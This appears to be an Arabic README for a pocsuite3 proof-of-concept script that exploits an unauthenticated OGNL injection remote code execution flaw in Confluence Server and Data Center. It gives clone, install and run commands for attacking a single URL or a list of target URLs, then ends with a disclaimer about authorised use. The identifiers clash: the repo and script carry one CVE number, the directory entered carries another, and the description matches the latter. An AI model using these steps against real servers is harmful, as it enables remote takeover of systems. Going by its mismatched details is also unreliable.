
في إصدارات Confluence Server وData Center المتأثرة، توجد ثغرة أمنية من نوع OGNL Injection تسمح للمهاجمين غير الموثَّقين بتنفيذ أكواد عشوائية على خادم Confluence Server أو Data Center.
git clone https://github.com/yigexioabai/CVE-2021-46422-RCE.git
cd CVE-2022-26134-cve1
pip3 install -r requirements.txt
ضع CVE-2021-46422 RCE.py في دليل pocs داخل pocsuite3\pocs
cd pocs
رابط واحد:
pocsuite -r CVE-2021-46422 RCE.py -u url
روابط متعددة:
pocsuite -r CVE-2021-46422 RCE.py -f url.txt (الملف الذي يحتوي على الروابط) --verify
هذه الأداة مخصصة فقط لأنشطة أمن المؤسسات المرخصة قانونًا. إذا كنت بحاجة لاختبار قابلية استخدام الأداة، يرجى إعداد بيئة اختبار خاصة بك.
عند استخدام هذه الأداة للفحص، يجب عليك التأكد من أن هذا النشاط يتوافق مع القوانين واللوائح المحلية، وأنك حصلت على التصريح الكافي. يُرجى عدم إجراء مسح ضوئي على أهداف غير مصرح بها.
إذا قمت بأي نشاط غير قانوني أثناء استخدام هذه الأداة، فأنت تتحمل العواقب بنفسك، ولن نتحمل أي مسؤولية قانونية أو تضامنية.